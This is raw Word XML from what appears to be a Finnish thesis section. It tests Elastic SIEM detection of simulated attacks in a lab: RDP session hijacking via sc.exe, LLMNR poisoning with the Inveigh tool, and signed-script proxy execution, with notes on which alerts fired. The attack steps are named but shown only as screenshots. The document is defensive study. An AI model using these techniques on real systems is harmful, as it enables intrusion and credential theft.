      <w:r w:rsidRPr="00AF21F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BD26FB" wp14:editId="45AB290A">
            <wp:extent cx="5100762" cy="2250305"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="74719300"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300" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5107584" cy="2253315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A86FDF" w:rsidP="00D02912" w:rsidRDefault="00D02912" w14:paraId="6CF597E8" w14:textId="65E69787">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971545" w:id="69"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidR="00BF4F1F">
        <w:t>Analytiikkaa hyökkäyksestä</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0021673B" w:rsidP="00C47CED" w:rsidRDefault="00C31CA5" w14:paraId="17DD05BD" w14:textId="76CA9A87">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc983488252" w:id="670640090"/>
      <w:r w:rsidR="00C31CA5">
        <w:rPr/>
        <w:t>Etä</w:t>
      </w:r>
      <w:r w:rsidR="006368A0">
        <w:rPr/>
        <w:t>käytön kaappaus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="670640090"/>
      <w:r w:rsidR="006368A0">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD0234" w:rsidRDefault="00CD0234" w14:paraId="7E5BF722" w14:textId="08232C05">
      <w:r w:rsidR="00CD0234">
        <w:rPr/>
        <w:t xml:space="preserve">Hyökkääjä yrittää käyttää hyödykseen </w:t>
      </w:r>
      <w:r w:rsidR="00960ECA">
        <w:rPr/>
        <w:t xml:space="preserve">Windowsin etäkäyttöä </w:t>
      </w:r>
      <w:r w:rsidR="009C75F2">
        <w:rPr/>
        <w:t xml:space="preserve">ja päästä sen avulla </w:t>
      </w:r>
      <w:r w:rsidR="00FD1C9C">
        <w:rPr/>
        <w:t>urkkimaan järjestelmiä</w:t>
      </w:r>
      <w:r w:rsidR="1E4FE83D">
        <w:rPr/>
        <w:t>. SIEM voi havaita etäkäytön kaappausyrityksen ainakin seuraamalla lokitietoja ja huomaamalla s</w:t>
      </w:r>
      <w:r w:rsidR="74860DAC">
        <w:rPr/>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="1E4FE83D">
        <w:rPr/>
        <w:t>.exe-komennot</w:t>
      </w:r>
      <w:r w:rsidR="2CE255D2">
        <w:rPr/>
        <w:t xml:space="preserve"> ja niiden suorittamisen. SIEM voi myös havaita, että komentoa käytetään epätavallisesti, kuten outo käyttäjä tai outoon aikaan</w:t>
      </w:r>
      <w:r w:rsidR="39BD4818">
        <w:rPr/>
        <w:t>. Työkalussa voi olla myös sääntöjä, joiden avulla se huomaa tietynlaiset palveluiden käynnistyksen, joita ei ehkä muuten paljoa käytet</w:t>
      </w:r>
      <w:r w:rsidR="1FA358B2">
        <w:rPr/>
        <w:t>ä. Se voi myös huomata yhteydet ulospäin organisaation verkosta</w:t>
      </w:r>
      <w:r w:rsidR="4F8FA9A9">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C833F4" w:rsidP="00385941" w:rsidRDefault="00BF4F1F" w14:paraId="26375E61" w14:textId="4BA9351F">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00C833F4">
        <w:t>jetaan DC01:llä komennot kuvion 29 mukaisesti</w:t>
      </w:r>
      <w:r w:rsidR="00B226A4">
        <w:t>, vaikka sesshijack käynnistys ei onnistu</w:t>
      </w:r>
      <w:r w:rsidR="00701277">
        <w:t xml:space="preserve">, syntyy tästä hälytys </w:t>
      </w:r>
      <w:r w:rsidR="009823F1">
        <w:t>koska sc.exe</w:t>
      </w:r>
      <w:r w:rsidR="008636A8">
        <w:t xml:space="preserve"> palvelua on kutsuttu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D95631" w:rsidP="00D95631" w:rsidRDefault="00B226A4" w14:paraId="3C61A539" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B226A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BC4340A" wp14:editId="6BF7A336">
            <wp:extent cx="6120130" cy="1385570"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="37553698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36985" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1385570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C833F4" w:rsidP="00D95631" w:rsidRDefault="00D95631" w14:paraId="18BA9D8E" w14:textId="172FF732">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971546" w:id="71"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidR="00BF4F1F">
        <w:t>Etäkäytön kaappaus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF267B" w:rsidP="00385941" w:rsidRDefault="007F4437" w14:paraId="6CE27903" w14:textId="3CAB736D">
      <w:r>
        <w:t xml:space="preserve">Tästä syntyi </w:t>
      </w:r>
      <w:r w:rsidR="00FF267B">
        <w:t xml:space="preserve">hälytys </w:t>
      </w:r>
      <w:r>
        <w:t>Elasticiin</w:t>
      </w:r>
      <w:r w:rsidR="00FF267B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BC3FE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF267B">
        <w:t>(Kuvio 30)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D95631" w:rsidP="00D95631" w:rsidRDefault="00D95631" w14:paraId="4ED15525" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00D95631">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C635BFA" wp14:editId="690C2C63">
            <wp:extent cx="6120130" cy="501650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117594369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3690" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="501650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC3FE6" w:rsidP="00D95631" w:rsidRDefault="00D95631" w14:paraId="5A28B256" w14:textId="0C9FBAE0">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971547" w:id="72"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidR="007F4437">
        <w:t>Hälytys sc.exe:n käytöstä</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B4871" w:rsidP="00D95631" w:rsidRDefault="00D95631" w14:paraId="4FB05123" w14:textId="599F4741">
      <w:r w:rsidR="00D95631">
        <w:rPr/>
        <w:t>Elas</w:t>
      </w:r>
      <w:r w:rsidR="007F4437">
        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00D95631">
        <w:rPr/>
        <w:t>icin</w:t>
      </w:r>
      <w:r w:rsidR="00D95631">
        <w:rPr/>
        <w:t xml:space="preserve"> analyysityökalulla </w:t>
      </w:r>
      <w:r w:rsidR="000131B2">
        <w:rPr/>
        <w:t xml:space="preserve">näkee enemmän tietoa </w:t>
      </w:r>
      <w:r w:rsidR="001B4871">
        <w:rPr/>
        <w:t xml:space="preserve">suoritetusta komennosta. </w:t>
      </w:r>
      <w:r w:rsidR="5662ADBB">
        <w:rPr/>
        <w:t>Komennot voivat kertoa SIEM</w:t>
      </w:r>
      <w:r w:rsidR="784A507A">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="5662ADBB">
        <w:rPr/>
        <w:t>käyttäjille, mitä hyökkääjä on tehnyt järjestelmässä,</w:t>
      </w:r>
      <w:r w:rsidR="06BEF5BE">
        <w:rPr/>
        <w:t xml:space="preserve"> kuten</w:t>
      </w:r>
      <w:r w:rsidR="5662ADBB">
        <w:rPr/>
        <w:t xml:space="preserve"> esimerkiksi, jos proses</w:t>
      </w:r>
      <w:r w:rsidR="63E7F7FC">
        <w:rPr/>
        <w:t xml:space="preserve">si on tunnettu taktiikka, jota on käytetty jo aiemmin. </w:t>
      </w:r>
      <w:r w:rsidR="001B4871">
        <w:rPr/>
        <w:t>(Kuvio 31)</w:t>
      </w:r>
      <w:r w:rsidR="007F4437">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0CA6" w:rsidP="009F0CA6" w:rsidRDefault="001B4871" w14:paraId="2C05BAED" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="001B4871">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14D17617" wp14:editId="40313F6B">
            <wp:extent cx="4392778" cy="2351809"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="1528078917"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78917" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4398853" cy="2355062"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0CA6" w:rsidP="009F0CA6" w:rsidRDefault="009F0CA6" w14:paraId="72E0D6C2" w14:textId="6AF89854">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971548" w:id="73"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:r w:rsidR="007F4437">
        <w:t>Etäkäytön analyysi 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C204D" w:rsidP="001C204D" w:rsidRDefault="001C204D" w14:paraId="1F761D43" w14:textId="5FA04691">
      <w:r w:rsidR="17219EE8">
        <w:rPr/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="001C204D">
        <w:rPr/>
        <w:t xml:space="preserve">ästä </w:t>
      </w:r>
      <w:r w:rsidR="008D4EC4">
        <w:rPr/>
        <w:t xml:space="preserve">syntyi myös toinen </w:t>
      </w:r>
      <w:r w:rsidR="00DB7D51">
        <w:rPr/>
        <w:t>hälytys,</w:t>
      </w:r>
      <w:r w:rsidR="008D4EC4">
        <w:rPr/>
        <w:t xml:space="preserve"> joka näyttää analyysi työkalulla </w:t>
      </w:r>
      <w:r w:rsidR="00DB7D51">
        <w:rPr/>
        <w:t>tältä. (Kuvio 32)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB7D51" w:rsidP="001C204D" w:rsidRDefault="00DB7D51" w14:paraId="1BCE0672" w14:textId="77777777"/>
    <w:p w:rsidR="00C624ED" w:rsidP="00C624ED" w:rsidRDefault="00DB7D51" w14:paraId="6157B537" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00DB7D51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D63DC09" wp14:editId="100A1C25">
            <wp:extent cx="5219395" cy="2353006"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="1653501452" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti,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01452" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, diagrammi&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5224316" cy="2355224"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="001C204D" w:rsidR="00DB7D51" w:rsidP="00C624ED" w:rsidRDefault="00C624ED" w14:paraId="75525994" w14:textId="29F1BF1E">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971549" w:id="74"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Etäkäytön analyysi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidR="007F4437">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2EB5" w:rsidP="00C47CED" w:rsidRDefault="009F2EB5" w14:paraId="2ACB5914" w14:textId="4733C030">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1322904999" w:id="2079708453"/>
      <w:r w:rsidR="009F2EB5">
        <w:rPr/>
        <w:t xml:space="preserve">LLMNR </w:t>
      </w:r>
      <w:r w:rsidR="00E92FC5">
        <w:rPr/>
        <w:t>saastuttaminen Inveigh työkalulla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2079708453"/>
    </w:p>
    <w:p w:rsidR="00E92FC5" w:rsidP="00E92FC5" w:rsidRDefault="000F4204" w14:paraId="45FEC480" w14:textId="4698E9E8">
      <w:r w:rsidR="000F4204">
        <w:rPr/>
        <w:t xml:space="preserve">Hyökkääjä saattaa hyödyntää iskussaan Microsoft Windows -verkkojen nimenratkaisuprotokollaa (LLMNR ja NBT-NS) ja </w:t>
      </w:r>
      <w:r w:rsidR="000F4204">
        <w:rPr/>
        <w:t>SMB:n</w:t>
      </w:r>
      <w:r w:rsidR="000F4204">
        <w:rPr/>
        <w:t xml:space="preserve"> (Server Message </w:t>
      </w:r>
      <w:r w:rsidR="000F4204">
        <w:rPr/>
        <w:t>Block</w:t>
      </w:r>
      <w:r w:rsidR="000F4204">
        <w:rPr/>
        <w:t>) todennusta manipuloidakseen liikennettä ja varastaakseen käyttäjien kirjautumistietoja.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E803E95" w:rsidP="261F289F" w:rsidRDefault="7E803E95" w14:paraId="12D23908" w14:textId="18790FAA">
      <w:pPr>
        <w:pStyle w:val="Normaali"/>
      </w:pPr>
      <w:r w:rsidR="7E803E95">
        <w:rPr/>
        <w:t>LLMNR-saastuttaminen voidaan havaita SIEM-työkalussa tarkkailemalla LLMNR</w:t>
      </w:r>
      <w:r w:rsidR="24236FA4">
        <w:rPr/>
        <w:t>- ja NBT-NS</w:t>
      </w:r>
      <w:r w:rsidR="7E803E95">
        <w:rPr/>
        <w:t>-kyselyjä.</w:t>
      </w:r>
      <w:r w:rsidR="46500125">
        <w:rPr/>
        <w:t xml:space="preserve"> Kummallinen</w:t>
      </w:r>
      <w:r w:rsidR="7E803E95">
        <w:rPr/>
        <w:t xml:space="preserve"> määrä nimenratkaisupyyntöjä tai tuntemattomista lähteistä</w:t>
      </w:r>
      <w:r w:rsidR="52EDA474">
        <w:rPr/>
        <w:t xml:space="preserve"> tulevat kyselyt</w:t>
      </w:r>
      <w:r w:rsidR="7E803E95">
        <w:rPr/>
        <w:t xml:space="preserve"> voi</w:t>
      </w:r>
      <w:r w:rsidR="638CD141">
        <w:rPr/>
        <w:t>vat näkyä SIEM-työkalussa</w:t>
      </w:r>
      <w:r w:rsidR="7E803E95">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="7C6DDEDC">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7E803E95">
        <w:rPr/>
        <w:t>SIEM voi havaita SMB-autentikoin</w:t>
      </w:r>
      <w:r w:rsidR="4C90DEA6">
        <w:rPr/>
        <w:t>nin</w:t>
      </w:r>
      <w:r w:rsidR="7E803E95">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4B6D17C9">
        <w:rPr/>
        <w:t>ja</w:t>
      </w:r>
      <w:r w:rsidR="7E803E95">
        <w:rPr/>
        <w:t xml:space="preserve"> epäilyttäviä kirjautumisyhteyksiä.</w:t>
      </w:r>
      <w:r w:rsidR="5FA36197">
        <w:rPr/>
        <w:t xml:space="preserve"> SMB palvelussa on ollut paljon tu</w:t>
      </w:r>
      <w:r w:rsidR="4DD09583">
        <w:rPr/>
        <w:t>nnettuja haavoittuvuuksia, ja tämän takia, hyökkääjä voi yrittää sitä kautta järjestelmään.</w:t>
      </w:r>
      <w:r w:rsidR="200E5757">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="24BE81A4">
        <w:rPr/>
        <w:t xml:space="preserve">Hyökkäystyökalu </w:t>
      </w:r>
      <w:r w:rsidR="200E5757">
        <w:rPr/>
        <w:t>Inveigh</w:t>
      </w:r>
      <w:r w:rsidR="200E5757">
        <w:rPr/>
        <w:t xml:space="preserve"> voi tuottaa hälytyksiä, kun epäilyttäviä prosesseja ajetaan järjestelmässä</w:t>
      </w:r>
      <w:r w:rsidR="6F45E5BD">
        <w:rPr/>
        <w:t>. SIEM voi nähdä nämä</w:t>
      </w:r>
      <w:r w:rsidR="200E5757">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="200E5757">
        <w:rPr/>
        <w:t>esimerkiksi</w:t>
      </w:r>
      <w:r w:rsidR="2C38685C">
        <w:rPr/>
        <w:t xml:space="preserve"> kerätyistä</w:t>
      </w:r>
      <w:r w:rsidR="200E5757">
        <w:rPr/>
        <w:t xml:space="preserve"> lok</w:t>
      </w:r>
      <w:r w:rsidR="1C4B5E06">
        <w:rPr/>
        <w:t>itiedoista.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F4204" w:rsidP="00E92FC5" w:rsidRDefault="009D4549" w14:paraId="350E37A2" w14:textId="58DA3B04">
      <w:r>
        <w:t>Käytetään simuloinnissa Inveigh hyökkäystyökalua</w:t>
      </w:r>
      <w:r w:rsidR="000F7942">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00483E30">
        <w:t xml:space="preserve"> Työkalu </w:t>
      </w:r>
      <w:r w:rsidR="00B54D0C">
        <w:t>haistelee järjestelmästä tietoja.</w:t>
      </w:r>
      <w:r w:rsidR="00C624ED">
        <w:t xml:space="preserve"> (Kuvio 33).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C624ED" w:rsidP="00C624ED" w:rsidRDefault="00197D0E" w14:paraId="6643A54D" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00197D0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="433E7B1D" wp14:editId="13934AD0">
            <wp:extent cx="6120130" cy="4665345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="491806893"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6893" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, ohjelmisto&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4665345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E92FC5" w:rsidR="000F7942" w:rsidP="00C624ED" w:rsidRDefault="00C624ED" w14:paraId="4FB5A05F" w14:textId="4326A625">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971550" w:id="76"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>33</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Inveighin käyttö</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w:rsidRPr="00385941" w:rsidR="00D95631" w:rsidP="00385941" w:rsidRDefault="00D31CAE" w14:paraId="5EC846C5" w14:textId="7921E0F2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ainut hälytys mitä tästä aiheutui</w:t>
      </w:r>
      <w:r w:rsidR="008606D1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> oli </w:t>
      </w:r>
      <w:r w:rsidR="008B2095">
        <w:t>työkalun latausvaiheessa</w:t>
      </w:r>
      <w:r w:rsidR="00AA1D48">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008606D1">
        <w:t>Elastic</w:t>
      </w:r>
      <w:r w:rsidR="00461285">
        <w:t xml:space="preserve"> ilmoitti yhteydestä tunnettuun haittaohjelmasivustoon. </w:t>
      </w:r>
      <w:r w:rsidR="00CD3891">
        <w:t xml:space="preserve">Muiden hälytysten puute johtuu todennäköisesti </w:t>
      </w:r>
      <w:r w:rsidR="00CD1E56">
        <w:t>Elasticin säännöistä</w:t>
      </w:r>
      <w:r w:rsidR="006E7033">
        <w:t>, joita ei ole riittävästi huomaamaan kaikkia turvallisuus</w:t>
      </w:r>
      <w:r w:rsidR="00AC7511">
        <w:t>riskejä.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00385941" w:rsidR="00AC7511" w:rsidP="00C47CED" w:rsidRDefault="006A045F" w14:paraId="080B1B9D" w14:textId="1A0C6E9D">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1457882055" w:id="1346274810"/>
      <w:r w:rsidR="006A045F">
        <w:rPr/>
        <w:t>Ohjelmien suorittaminen allekirjoitetun skriptin välityksellä</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1346274810"/>
    </w:p>
    <w:p w:rsidRPr="006A045F" w:rsidR="006A045F" w:rsidP="006A045F" w:rsidRDefault="002B5727" w14:paraId="0F786E3E" w14:textId="3CDE0191">
      <w:r w:rsidR="002B5727">
        <w:rPr/>
        <w:t>Hyökkääjä voi käyttää luotettuja</w:t>
      </w:r>
      <w:r w:rsidR="00C25F5F">
        <w:rPr/>
        <w:t xml:space="preserve">, usein sertifikaatilla allekirjoitettuja skriptejä haitallisten tiedostojen suorittamiseen. </w:t>
      </w:r>
      <w:r w:rsidR="0043523A">
        <w:rPr/>
        <w:t xml:space="preserve">Näin hyökkääjällä on mahdollisuus </w:t>
      </w:r>
      <w:r w:rsidR="001E1D5A">
        <w:rPr/>
        <w:t xml:space="preserve">kiertää sovellusten valvonta ja </w:t>
      </w:r>
      <w:r w:rsidR="00A52CFC">
        <w:rPr/>
        <w:t>allekirjoitusten tarkistus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0B72B671" w:rsidRDefault="0B72B671" w14:paraId="780AD74C" w14:textId="1AED1B92">
      <w:r w:rsidR="0B72B671">
        <w:rPr/>
        <w:t>Allekirjoitetut skriptit voidaan havaita lokitiedoista ja prosessivalvonnassa, kun havaitaa</w:t>
      </w:r>
      <w:r w:rsidR="075E7909">
        <w:rPr/>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0B72B671">
        <w:rPr/>
        <w:t xml:space="preserve"> epäilyttäviä prosesseja käynnistyvän järjestelmässä. </w:t>
      </w:r>
      <w:r w:rsidR="3C494772">
        <w:rPr/>
        <w:t>Prosessit, kuten skrip</w:t>
      </w:r>
      <w:r w:rsidR="064268FA">
